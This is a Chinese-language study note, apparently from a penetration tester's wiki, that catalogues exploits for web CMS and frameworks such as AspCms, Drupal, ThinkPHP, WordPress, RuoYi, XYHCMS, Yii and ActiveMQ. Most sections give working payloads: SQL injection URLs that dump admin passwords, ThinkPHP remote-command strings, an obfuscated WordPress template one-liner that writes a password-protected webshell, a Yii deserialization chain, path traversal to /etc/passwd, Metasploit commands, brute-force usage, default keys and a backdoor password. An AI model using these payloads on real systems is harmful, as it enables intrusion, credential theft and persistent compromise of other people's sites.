学习笔记-B/S - Exploits
B/S - Exploits
免责声明
本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.
大纲
-
- Adminer
- ApiSix
- Apollo
- AppWeb
- Bitbucket
- Cacti
- Confluence
- Crowd
- Django
- DolphinScheduler
- FlySpray
- GateOne
- Gerapy
- Gitea
- GitLab
- GoCD
- Gogs
- Grafana
- GraphQL
- Harbor
- HFS
- Horde_Groupware_Webmail
- HUE
- ixcache
- jellyfin
- Jenkins
- Jira
- JumpServer
- Jupyter
- Kibana
- KodExplorer
- MetaBase
- MinIO
- Moodle
- Nexus
- NiFi
- nodejs
- noVNC
- OFBiz
- phpMyAdmin
- PHP
- rConfig
- ResourceSpace
- SaltStack
- SAP
- Sentinel
- ShenYu
- ShowDoc
- SkyWalking
- Smartbi
- SonarQube
- Supervisord
- TerraMaster-TOS
- TRS_WAS
- Unomi
- Webmin
- XXL-job
- Zabbix
- 宝塔
- 禅道
- 帆软
各类论坛/CMS框架
什么是 CMS
内容管理系统 (CMS) 是一种存储所有数据 (如文本,照片,音乐,文档等) 并在你的网站上提供的软件. 它有助于编辑,发布和修改网站的内容.
工具包
- SecWiki/CMS-Hunter - CMS 漏洞测试用例集合
- Q2h1Cg/CMS-Exploit-Framework - 一款 CMS 漏洞利用框架,通过它可以很容易地获取、开发 CMS 漏洞利用插件并对目标应用进行测试。
- Lucifer1993/AngelSword - Python3 编写的 CMS 漏洞检测框架
- foospidy/web-cve-tests - A simple framework for sending test payloads for known web CVEs.
74CMS
骑士 CMS 6.0.48以下文件包含getshell
- 相关文章
AEN
相关工具
aspcms
fofa: Powered by AspCms2
AspCms1.5 版以下注入漏洞
- POC | Payload | exp
# 爆用户名 EXP http://www.***.com/plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1 这是爆 ID=1 的账户名,如果发现权限不够可以往后试 2,3,4……….. # 爆密码 http://www.xxx.com/plug/productbuy.asp?id=2+union+select+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1 后台登录地址:/admin/login.asp 后台拿 shell 1. 直接上传`.asp;x` 2. 系统配置信息 3. 模版管理新建 `1.asp` 模板,内容写马的内容.
AspCms2.1.4 GBK 版,未验证权限、且存在注入漏洞
- POC | Payload | exp
admin/_content/_About/AspCms_AboutEdit.asp
http://www.xxx.com/admin/_content/_About/AspCms_AboutEdit.asp?id=19 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from aspcms_user where userid=1
AspCms2.0未验证权限,且存在注入漏洞
-
POC | Payload | exp
admin/_content/_About/AspCms_AboutEdit.asp?id=19
- 表名:aspcms_user
- 列名:loginname、password
http://www.xxx.com/admin/_content/_About/AspCms_AboutEdit.asp?id=19 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,password,25,26,27,28,29,30,31,32,33,34,35 from aspcms_user where userid=1
Cookies 欺骗
- POC | Payload | exp
cookies:username=admin; ASPSESSIONIDAABTAACS=IHDJOJACOPKFEEENHHMJHKLG; LanguageAlias=cn; LanguagePath=%2F; languageID=1; adminId=1; adminName=admin; groupMenu=1%2C+70%2C+10%2C+11%2C+12%2C+13%2C+14%2C+20%2C+68%2C+15%2C+16%2C+17%2C+18%2C+3%2C+25%2C+57%2C+58%2C+59%2C+2%2C+21%2C+22%2C+23%2C+24%2C+4%2C+27%2C+28%2C+29%2C+5%2C+49%2C+52%2C+56%2C+30%2C+51%2C+53%2C+54%2C+55%2C+188%2C+67%2C+63%2C+190%2C+184%2C+86%2C+6%2C+32%2C+33%2C+34%2C+8%2C+37%2C+183%2C+38%2C+60%2C+9; GroupName=%B3%AC%BC%B6%B9%DC%C0%ED%D4%B1%D7%E9
进入后台后GetShell
- POC | Payload | exp
所有版本存在后台编辑风格 可以修改任意文件,获取webshell就很简单了
插入http://www.xxx.com/AspCms_TemplateEdit.asp?acttype=&filename=../../../index.asp
asp;x
文件蚁剑连接即可。
dedeCMS
相关工具
- lengjibo/dedecmscan - 织梦全版本漏洞扫描工具
相关文章
5.8.1 rce
SRC-2021-0029 : Dedecms GetCookie Type Juggling Authentication Bypass Vulnerability
-
影响版本
- Dedecms <= v5.7.84 release
-
POC | Payload | exp
Discuz
Discuz
官网 : https://www.discuz.net/forum.php
https://gitee.com/Discuz/DiscuzX
相关文章
- Discuz!X 前台任意文件删除漏洞深入解析
- Discuz!因Memcached未授权访问导致的RCE
- Discuz!X 个人账户删除漏洞
- Discuz!x3.4后台文件任意删除漏洞分析
- DiscuzX v3.4 排行页面存储型XSS漏洞 分析
- WooYun-2015-137991 Discuz利用UC_KEY进行前台getshell2
CVE-2018-14729
-
描述
Discuz!1.5 至 2.5 中的
source/admincp/admincp_db.php
中的数据库备份功能允许远程攻击者执行任意 PHP 代码。 -
影响版本
- Discuz! 1.5 ~ 2.5
-
相关文章
-
POC | Payload | exp
DiscuzX 3.4 SSRF
Discuz!ML
官网 : https://discuz.ml/
discuzml-v-3-x-code-injection-vulnerability
- POC | Payload | exp
CVE-2019-13956
-
描述
该漏洞存在 discuz ml(多国语言版)中,cookie 中的 language 可控并且没有严格过滤,导致可以远程代码执行。
-
影响版本
- Discuz! ML V3.2
- Discuz! ML V3.3
- Discuz! ML V3.4
-
相关文章
Drupal
Tips
对'/node/$'进行Fuzz,其中'$'是一个数字(从1到500)。⽐如说:"/node/$"。
CVE-2014-3704 “Drupalgeddon” SQL 注入漏洞
-
描述
Drupal 7.0~7.31 版本中存在一处无需认证的 SQL 漏洞。通过该漏洞,攻击者可以执行任意 SQL 语句,插入、修改管理员信息,甚至执行任意代码。
-
影响版本
- Drupal 7.0 ~ 7.31
-
POC | Payload | exp
-
MSF Module
use exploit/multi/http/drupal_drupageddon set RHOSTS [ip] run
CVE-2017-6920 Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞
-
描述
2017年6月21日,Drupal 官方发布了一个编号为 CVE-2017- 6920 的漏洞,影响为 Critical.这是 Drupal Core 的 YAML 解析器处理不当所导致的一个远程代码执行漏洞,影响 8.x 的 Drupal Core.
-
影响版本
- Drupal 8.x
-
相关文章
CVE-2018-7600 Drupal Drupalgeddon 2 远程代码执行漏洞
-
描述
Drupal 是一款用量庞大的 CMS,其 6/7/8 版本的 Form API 中存在一处远程代码执行漏洞。
-
影响版本
- Drupal 6/7/8
-
POC | Payload | exp
-
MSF Module
use exploit/unix/webapp/drupal_drupalgeddon2 set RHOSTS [ip] run
CVE-2018-7602 远程代码执行漏洞
-
影响版本
- Drupal 7.x
- Drupal 8.x
-
POC | Payload | exp
CVE-2019-6339 远程代码执行漏洞
-
描述
phar 反序列化 RCE
-
影响版本
- Drupal 7.0 ~ 7.62
- Drupal 8.5.0 ~ 8.5.9
- Drupal 8.6.0 ~ 8.6.6
-
相关文章
-
POC | Payload | exp
CVE-2019-6341 XSS
-
描述
通过文件模块或者子系统上传恶意文件触发 XSS 漏洞
-
影响版本
- Drupal 7.0 ~ 7.65
- Drupal 8.5.0 ~ 8.5.14
- Drupal 8.6.0 ~ 8.6.13
-
相关文章
-
POC | Payload | exp
CVE-2020-28948
ECshop
ECShop 是一款 B2C 独立网店系统,适合企业及个人快速构建个性化网上商店.系统是基于 PHP 语言及 MYSQL 数据库构架开发的跨平台开源程序.
ECShop 2.x/3.x SQL 注入/任意代码执行漏洞
-
描述
其2017年及以前的版本中,存在一处 SQL 注入漏洞,通过该漏洞可注入恶意数据,最终导致任意代码执行漏洞.其 3.6.0 最新版已修复该漏洞.
-
影响版本
- ECShop 2.x/3.x
-
相关文章
ecshop后台getshell
- 相关文章
Fastadmin
FastAdmin 是一款基于 ThinkPHP5+Bootstrap 开发的极速后台开发框架。FastAdmin 基于 Apache2.0 开源协议发布,目前被广泛应用于各大行业应用后台管理。
Fastadmin 前台 Getshell
Laravel
Fofa: app="Laravel-Framework"
相关文章
env 泄露
- POC | Payload | exp
/.env
日志泄露
- POC | Payload | exp
/storage/logs/laravel.log
Debug模式
- POC | Payload | exp
/logout /param[]=0
Laravel PHPUnit Remote Code Execution
-
影响版本
- Before 4.8.28 and 5.x before 5.6.3
-
POC | Payload | exp
curl -d "<?php echo php_uname(); ?>" http://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
CVE-2021-3129 Laravel Debug 页面 RCE
-
相关文章
-
POC | Payload | exp
Laravel 8.x image upload bypass
jeecg
fofa: app="JEECG"
相关文章
密码重置
- POC | Payload | exp
- 当访问loginController.do?goPwdInit 或 pwdInit时,即使用户已经修改过密码,admin的密码仍会被重置为123456。
sessionid 信息泄露
- POC | Payload | exp
http://localhost:8080/webpage/system/druid/websession.json
文件上传
- POC | Payload | exp
/jeecgFormDemoController.do?commonUpload
jeewms
Fofa: body="plug-in/lhgDialog/lhgdialog.min.js?skin=metro" && body="仓"
未授权任意文件读取漏洞
- POC | Payload | exp
http://x.x.x.x:8088/systemController/showOrDownByurl.do?down=&dbPath=../Windows/win.ini http://x.x.x.x:8020/systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd
Joomla
相关工具
- rezasp/joomscan - 效果很差,没啥用
CVE-2017-8917 Joomla! 3.7 Core SQL 注入
-
描述
Joomla 于5月17日发布了新版本 3.7.1,本次更新中修复一个高危 SQL 注入漏洞,成功利用该漏洞后攻击者可以在未授权的情况下进行 SQL 注入。
-
影响版本
- joomla 3.7.0
-
相关文章
-
POC | Payload | exp
http://你的 IP 地址:端口号/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)
sqlmap payload
sqlmap -u "http://192.168.1.1/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -T '#__users' -C name,password --dump
CVE-2021-23132
- POC | Payload | exp
Maccms
Maccms v10后门
- POC | Payload | exp
maccms10\extend\upyun\src\Upyun\Api\Format.php maccms10\extend\Qcloud\Sms\Sms.php 密码 WorldFilledWithLove
MetInfo
相关文章
- MetInfo5.3.19安装过程过滤不严导致Getshell
- MetInfo6.0.0漏洞集合(一)
- MetInfo6.1.0 漏洞(二)
- Metinfo 6.1.2 SQL注入
- metinfo最新版本后台getshell
- Metinfo7的一些鸡肋漏洞
- Metinfo7.0 SQL Blind Injection
CVE-2018-13024
-
描述
远程攻击者可通过向 admin/column/save.php 文件发送
module
参数利用该漏洞向 .php 文件写入代码并执行该代码. -
影响版本
- MetInfo 5.3.16
- MetInfo 6.0.0
-
相关文章
-
POC | Payload | exp
admin/column/save.php?name=123&action=editor&foldername=upload&module=22;@eval($_POST[1]);/*
October
October CMS 1.0.412 - Multiple Vulnerabilities
- POC | Payload | exp
pBootCMS
pBootCMS 3.0.4 前台注入
php7cms
文件包含漏洞
- 相关文章
PHPMyWind
相关文章
PHPMyWind 5.3 - Cross-Site Scripting
- POC | Payload | exp
RuoYi
Fofa: app="若依-管理系统"
默认口令
admin/admin123
后台任意文件读
-
影响版本
- RuoYi <= v4.5.0
-
POC | Payload | exp
/common/download/resource?resource=/profile/../../../../etc/passwd
druid 未授权访问
- POC | Payload | exp
/prod-api/druid/index.html
默认shiro key
fCq+/xW488hMTCD+cmJ3aQ==
zSyK5Kp6PZAAjlT+eeNMlg==
4.6.1 后台注入
-
相关文章
-
POC | Payload | exp
POST /ruoyi/system/user/list HTTP/1.1 POST /ruoyi/system/user/export HTTP/1.1 POST /ruoyi/system/Allocated/list HTTP/1.1 POST /ruoyi/system/role/list HTTP/1.1 POST /ruoyi/system/dept/list HTTP/1.1 params[dataScope]=a
4.6.2 后台RCE
-
相关文章
- 记一次若依cms后台getshell
- bkfish/yaml-payload-for-Win - 用于windows反弹shell的yaml-payload
- 若依CMS4.6.0后台RCE
- 若依CMS后台getshell
- 记一次若依cms后台getshell
-
POC | Payload | exp
- lz2y/yaml-payload-for-ruoyi
- passer-W/Ruoyi-All - 若依后台定时任务一键利用
SeaCMS
Fofa: app="海洋CMS"
CVE-2020-21378 后台SQL注入漏洞
-
描述
攻击者可通过对admin_members_group.php的编辑操作中的id参数利用该漏洞进行SQL注入攻击。
-
POC | Payload | exp
/admin_members_group.php?action=edit&id=2%20and%20if(mid(user(),1,1)=%27r%27,concat(rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27))%20RLIKE%20%27(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2bcd%27,1)
ShopXO
CNVD-2021-15822 任意文件读取漏洞
Sitecore
fofa : "Sitecore Experience Platform"
Sitecore rce
SiteServer
相关文章
找回密码
管理员的 “密码找回问题答案” 为非强制项,一般都留空。此时如果在密码找回页面,输入空密码找回答案,就可以获得当前管理员的密码明文(页面有做 javascript 限制答案长度不能为 0,但禁用 javascript 即可绕过)
访问 /siteserver/forgetPassword.aspx, 然后禁止 Javascript。输入用户名,获取密码
6.8.3 验证码绕过 & 后台多处注入
-
相关文章
-
POC | Payload | exp
POST /api/v1/administrators/actions/login HTTP/1.1 {"account":"admin","password":"7fef6171469e80d32c0559f88b377245","isAutoLogin":true}
GET /SiteServer/settings/pageAdministrator.aspx?areaId=0&departmentId=0&keyword=1&lastActivityDate=3&order=1%2C(select%20case%20when%20(3*2*1=6%20AND%2000043=00043)%20then%201%20else%201*(select%20table_name%20from%20information_schema.tables)end)=1&pageNum=50&roleName= HTTP/1.1 GET /SiteServer/settings/pageUser.aspx?creationDate=0&groupId=-1&keyword=&lastActivityDate=0&loginCount=0&pageNum=0&searchType=if(now()=sysdate()%2Csleep(0)%2C0) HTTP/1.1
SiteServer CMS 远程模板下载 Getshell 漏洞
-
相关文章
-
POC | Payload | exp
ThinkAdmin
ThinkAdminV6 任意文件操作 CVE-2020-25540
-
相关文章
-
POC | Payload | exp
1、目录遍历注意 POST 数据包 rules 参数值需要 URL 编码 POST /admin.html?s=admin/api.Update/node rules=%5B%22.%2F%22%5D 2、文件读取,后面那一串是 UTF8 字符串加密后的结果。计算方式在 Update.php 中的加密函数。 /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b2r33322u2x2v1b2s2p382p2q2p372t0y342w34
ThinkCMF
Fofa: title="ThinkCMF"
ThinkCMF 任意内容包含漏洞
-
相关文章
-
POC | Payload | exp
ThinkPHP
<5
相关文章
- thinkphp一些版本的通杀漏洞payload
- 代码审计 | ThinkPHP3.x、5.x框架任意文件包含
- Thinkphp2.1爆出重大安全漏洞
- ThinkPHP3.2.3框架实现安全数据库操作分析
- ThinkPHP-漏洞分析集合
- ThinkPHP3.2 框架sql注入漏洞分析(2018-08-23)
- Thinkphp框架 3.2.x sql注入漏洞分析
- 【漏洞通报】ThinkPHP3.2.x RCE漏洞通报
日志泄露
/Application/Runtime/Logs/Home/16_09_06.log # 其中 Application 可能会变,比如 App
/Runtime/Logs/Home/16_09_06.log # 年份_月份_日期
/Runtime/Logs/User/16_09_06.log # 年份_月份_日期
- whirlwind110/tphack - Thinkphp3/5 Log 文件泄漏利用工具
5
相关文章
- ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 远程命令执行漏洞利用 (GetShell)
- 代码审计 | ThinkPHP3.x、5.x框架任意文件包含
- ThinkPHP 5.0.x、5.1.x、5.2.x 全版本远程命令执行漏洞
- ThinkPHP v5.1.22曝出SQL注入漏洞
- ThinkPHP-漏洞分析集合
- ThinkPHP 5.1.x SQL注入漏洞分析
- ThinkPHP框架 < 5.0.16 sql注入漏洞分析
- ThinkPHP 5.x 远程命令执行漏洞利用过程
- ThinkPHP漏洞总结
- 记一次简单的Thinkphp 5.x绕过姿势
相关工具
- Lucifer1993/TPscan - 一键 ThinkPHP 漏洞检测
- theLSA/tp5-getshell - thinkphp5 rce 漏洞检测工具
- sukabuliet/ThinkphpRCE - Thinkphp rce 扫描脚本,附带日志扫描
- tangxiaofeng7/TPScan
- bewhale/thinkphp_gui_tools - ThinkPHP 漏洞 综合利用工具, 图形化界面, 命令执行, 一键getshell, 批量检测, 日志遍历, session包含, 宝塔绕过
java -Dfile.encoding="UTF-8" --module-path "C:\Program Files\Java\javafx-sdk-11.0.2\lib" --add-modules "javafx.controls,javafx.fxml,javafx.web" -jar "xxx.jar"
资源
- Mochazz/ThinkPHP-Vuln - 关于 ThinkPHP 框架的历史漏洞分析集合
- SkyBlueEternal/thinkphp-RCE-POC-Collection - thinkphp v5.x 远程代码执行漏洞-POC集合
日志泄露
/runtime/log/202004/1.log # 年月/数字
- whirlwind110/tphack - Thinkphp 3/5 Log 文件泄漏利用工具
thinkphp 5
/tp5/public/?s=index/\think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1
(post)public/index.php (data)c=exec&f=calc.exe&_method=filter
thinkphp 5.0.10(完整版)
(post)public/index.php?s=index/index/index (data)s=whoami&_method=__construct&method&filter[]=system
thinkphp 5.0.21
/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
thinkphp 5.0.22
/?s=.|think\config/get&name=database.username
/?s=.|think\config/get&name=database.password
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
thinkphp 5.0.23(完整版)
(post)public/index.php?s=captcha (data) _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -al
thinkphp 5.0.23(完整版)debug模式
(post)public/index.php (data)_method=__construct&filter[]=system&server[REQUEST_METHOD]=touch%20/tmp/xxx
thinkphp 5.1.*
/?s=index/\think\Request/input&filter=phpinfo&data=1
/?s=index/\think\Request/input&filter=system&data=cmd
/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
/?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
(post)public/index.php (data)c=exec&f=calc.exe&_method=filter
thinkphp 5.2.*
(post)public/index.php (data)c=exec&f=calc.exe&_method=filter
未知版本未知版本
?s=index/\think\module/action/param1/${@phpinfo()}
?s=index/\think\Module/Action/Param/${@phpinfo()}
?s=index/\think/module/aciton/param1/${@print(THINK_VERSION)}
index.php?s=/home/article/view_recent/name/1'
header = "X-Forwarded-For:1') and extractvalue(1, concat(0x5c,(select md5(233))))#"
index.php?s=/home/shopcart/getPricetotal/tag/1%27
index.php?s=/home/shopcart/getpriceNum/id/1%27
index.php?s=/home/user/cut/id/1%27
index.php?s=/home/service/index/id/1%27
index.php?s=/home/pay/chongzhi/orderid/1%27
index.php?s=/home/pay/index/orderid/1%27
index.php?s=/home/order/complete/id/1%27
index.php?s=/home/order/complete/id/1%27
index.php?s=/home/order/detail/id/1%27
index.php?s=/home/order/cancel/id/1%27
index.php?s=/home/pay/index/orderid/1%27)%20UNION%20ALL%20SELECT%20md5(233)--+
POST /index.php?s=/home/user/checkcode/ HTTP/1.1
Content-Disposition: form-data; name="couponid"
1') union select sleep('''+str(sleep_time)+''')#
debug 信息泄露
>5
thinkphp6 session 任意文件创建漏洞
TPshop
目录遍历漏洞
-
相关文章
-
POC | Payload | exp
/index.php/Home/uploadify/fileList?type=.+&path=../../../
UCMS
CVE-2020-25483 后台文件上传漏洞
vBulletin
vBulletin 5.6.1 SQL 注入
http://localhost/vb5/ajax/api/content_attach/getIndexableContent" -H 'X-Requested-With: XMLHttpRequest' -d "nodeId[nodeid]=SQLi
获取管理员用户:
http://SITE/vb5/ajax/api/content_infraction/getIndexableContent" -H 'X-Requested-With: XMLHttpRequest' -d "nodeId[nodeid]=1+UNION+SELECT+26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,username,8,7,6,5,4,3,2,1+from+user+where+userid=1--
获取admin token:
http://SITE/vb5/ajax/api/content_infraction/getIndexableContent" -H 'X-Requested-With: XMLHttpRequest' -d "nodeId[nodeid]=1+UNION+SELECT+26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,token,8,7,6,5,4,3,2,1+from+user+where+userid=1--
Weiphp
CNVD-2020-68596 前台文件任意读取
- POC | Payload | exp
CNVD-2021-09693 Weiphp5.0 任意用户Cookie伪造
WordPress
WordPress 是一个开源的内容管理系统(CMS),允许用户构建动态网站和博客.
搭建教程
Tips
- 默认的登录地址一般是
/wp-admin
或/wp-login.php
相关工具
- wpscanteam/wpscan - kali 自带,漏洞扫描需要 API Token,可扫用户、漏洞、目录,挺好用的
wpscan --url https://www.xxxxx.com/ # 直接扫描 wpscan --url https://www.xxxxx.com/ --enumerate u # 枚举用户 wpscan --url https://www.xxxxx.com/ --passwords /tmp/password.txt # 密码爆破 wpscan --url https://www.xxxxx.com/ --usernames admin --passwords out.txt # 指定用户爆破 wpscan --url https://www.xxxxx.com/ --api-token xxxxxxxxCX8TTkkgt2oIY # 使用 API Token,扫描漏洞 wpscan --url https://www.xxxxx.com/ -e vp --api-token xxxxxxx # 扫描插件漏洞 wpscan --url https://www.xxxxx.com/ -e vt --api-token xxxxxxx # 扫描主题漏洞
xmlrpc.php
-
查看系统允许的方法
POST /wordpress/xmlrpc.php HTTP/1.1 Host: www.example.com Content-Length: 99 <methodCall> <methodName>system.listMethods</methodName> <params></params> </methodCall>
-
账号爆破
一般情况下,wordpress 的管理后台都会设置账号登录失败次数限制,因此,可以通过 xmlprc.php 接口来进行爆破。通常会使用 wp.getUserBlogs、wp.getCategories 和 metaWeblog.getUsersBlogs 这个方法来进行爆破,也可以使用其他的方法。
POST /wordpress/xmlrpc.php HTTP/1.1 Host: www.example.com Content-Length: 99 <methodCall> <methodName>wp.getUsersBlogs</methodName> <params> <param><value>admin</value></param> <param><value>password</value></param> </params> </methodCall>
-
SSRF
WordPress 版本 ❤️.5.1, 通过 Pingback 可以实现的服务器端请求伪造 (Server-side request forgery,SSRF) 和远程端口扫描。
POST /wordpress/xmlrpc.php HTTP/1.1 Host: www.example.com Content-Length: 99 <methodCall> <methodName>pingback.ping</methodName> <params><param> <value><string>要探测的ip和端口:http://127.0.0.1:80</string></value> </param><param><value><string>网站上一篇博客的URL:http://localhost/wordpress/?p=1)<SOME VALID BLOG FROM THE SITE ></string> </value></param></params> </methodCall>
WordPress 后台拿 SHELL
-
后台编辑404页面Getshell
"主题"-“编辑”-“404.php”
<script language="php">fputs(fopen(chr(46).chr(47).chr(99).chr(111).chr(110).chr(103).chr(46).chr(112).chr(104).chr(112),w),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(112).chr(97).chr(115).chr(115).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62));</script>
插到文件头,404默认模板路径是:wp-content/themes/twentyten/404.php,其中"twentyten"目录是默认模板目录。更新完直接访问 localhost/wp-content/themes/twentyten/404.php 就会在twentyten目录生成一句话后门文件cong.php 密码pass,插入的代码是Chr加密,可自行编辑。(仔细看代码,文件名与一句话代码用" ,w "隔开了)
-
上传本地主题Getshell
本机建立目录“test”,可以直接把一句话放到index.php文件,再新建一个style.css样式文件(版本不同,上传时会判断是否存在"index.php"文件和"style.css"样式文件。)
打包test目录为zip文件。WP后台的主题管理,上传主题,安装。则你的后门路径为:
localhost/wp-content/themes/test/index.php
CVE-2019-8942 & CVE-2019-8943 WordPress Crop-image Shell Upload
-
描述
此模块利用 WordPress 版本5.0.0和<= 4.9.8上的路径遍历和本地文件包含漏洞。 裁剪图像功能允许用户(至少具有作者权限)通过在上载期间更改 _wp_attached_file 引用来调整图像大小并执行路径遍历。 利用的第二部分将通过在创建帖子时更改 _wp_page_template 属性,将该图像包含在当前主题中。 目前,此漏洞利用模块仅适用于基于 Unix 的系统。
-
影响版本
- wordpress < 4.9.9
- wordpress 5.0 ~ 5.0:rc3
-
POC | Payload | exp
-
MSF Module
use exploit/multi/http/wp_crop_rce
WordPress <= 5.3.? DoS
- POC | Payload | exp
CVE-2022-21661 WP_Query SQLinj
- 相关文章
CVE-2022-21662 WordPress 5.8.2 Stored XSS Vulnerability
插件漏洞
- WordPress Plugin Mail Masta 1.0 - Local File Inclusion
XYHCMS
官网 : http://www.xyhcms.com/
fofa: app="XYHCMS"
fofa: icon_hash="-1300821702"
相关文章
后台路径
/xyhai.php
后台任意文件读取
- POC | Payload | exp
http://127.0.0.1/xyhai.php?s=/Templets/edit/fname/Li5cXC4uXFwuLlxcQXBwXFxDb21tb25cXENvbmZcXGRiLnBocA==
CNVD-2020-03899 后台文件写入导致代码执行漏洞
- POC | Payload | exp
后台,系统设置->网站设置->会员配置->禁止使用的名称 <?eval($_POST['cmd'])?> http://localhost/App/Runtime/Data/config/site.php
后台文件写入导致代码执行漏洞2
- POC | Payload | exp
后台,系统设置->网站设置,任意设置,在输入框内填 <?php phpinfo()?> http://localhost/App/Runtime/Data/config/site.php
windows 版本文件上传漏洞
- POC | Payload | exp
后台,系统设置->网站设置->上传配置->允许附件类型,添加类型 shell.php::$DATA 点击下面的 水印图片上传,之后会在图片部分显示上传路径,在windows下面,会自动忽略后面的::$DATA。
任意文件删除漏洞
- POC | Payload | exp
http://domain/xyhai.php?s=/Database/delSqlFiles/sqlfilename/..\\..\\..\\install/install.lock POST /xyhai.php?s=/Database/delSqlFiles/batchFlag/1 key[]=../../../install/install.lock 访问 http://domain/install 可以重装cms
后台任意文件下载
- POC | Payload | exp
http://domain/xyhai.php?s=/Database/downFile/file/..\\..\\..\\App\\Common\\Conf\\db.php/type/zip
CNVD-2021-05552 反序列化
- 相关文章
3.6 后台模版编辑rce
- 相关文章
Yii
Yii2 是一个高性能,基于组件的开源 PHP 框架,用于快速开发现代 Web 应用程序。
CVE-2020-15148 Yii 框架反序列化 RCE
-
描述
Yii Framework 2 在其 9月14 日发布的更新日志中公布了一个反序列化远程命令执行漏洞(CVE-2020-15148)。官方通过给yii\db\BatchQueryResult类加上__wakeup()函数,禁用了yii\db\BatchQueryResult的反序列化,阻止了应用程序对任意用户输入调用’unserialize()’造成的远程命令执行。
-
影响版本
- Yii2 Version < 2.0.38
-
相关文章
-
POC | Payload | exp
<?php namespace yii\rest{ class CreateAction{ public $checkAccess; public $id; public function __construct(){ $this->checkAccess = 'system'; $this->id = 'ls -al'; } } } namespace Faker{ use yii\rest\CreateAction; class Generator{ protected $formatters; public function __construct(){ $this->formatters['close'] = [new CreateAction, 'run']; } } } namespace yii\db{ use Faker\Generator; class BatchQueryResult{ private $_dataReader; public function __construct(){ $this->_dataReader = new Generator; } } } namespace{ echo base64_encode(serialize(new yii\db\BatchQueryResult)); } ?>
YxCMS
官网 : http://www.yxcms.net
常见路径
/index.php?r=admin # 后台 默认管理员账号密码 admin 123456
YxCMS 1.4.7 多个漏洞
- 相关文章
zcncms
相关文章
Zend
Fofa: app="ZF-Zend-Framework"
config 文件泄露
- POC | Payload | exp
//application/configs/application.ini
五指cms
任意⽂件删除漏洞
- 相关文章
框架引擎中间件
相关文章
工具包
- 1120362990/vulnerability-list - 在渗透测试中快速检测常见中间件、组件的高危漏洞.
- hatRiot/clusterd - application server attack toolkit
- matthiaskaiser/jmet - Java Message Exploitation Tool
ActiveMQ
Fofa: Apache ActiveMQ
Apache ActiveMQ 是美国阿帕奇 (Apache) 软件基金会所研发的一套开源的消息中间件,它支持 Java 消息服务、集群、Spring Framework 等.
相关文章
搭建教程
默认密码
admin admin
CVE-2015-1830 Apache ActiveMQ 5.11.1 Directory Traversal / Shell Upload
- MSF Module
use exploit/windows/http/apache_activemq_traversal_upload
CVE-2015-5254 ActiveMQ 反序列化漏洞
-
描述
Apache ActiveMQ 5.13.0 之前 5.x 版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类.远程攻击者可借助特制的序列化的 Java Message Service(JMS)ObjectMessage 对象利用该漏洞执行任意代码.
-
影响版本
- Apache ActiveMQ 5.0.0 ~ 5.12.1
-
相关文章
CVE-2016-3088 ActiveMQ 任意文件写入漏洞
-
描述
ActiveMQ 的 web 控制台分三个应用,admin、api 和 fileserver,其中 admin 是管理员页面,api 是接口,fileserver 是储存文件的接口;admin 和 api 都需要登录后才能使用,fileserver 无需登录.
fileserver 是一个 RESTful API 接口,我们可以通过 GET、PUT、DELETE 等 HTTP 请求对其中存储的文件进行读写操作,其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷,但后来发现:
- 其使用率并不高
- 文件操作容易出现漏洞
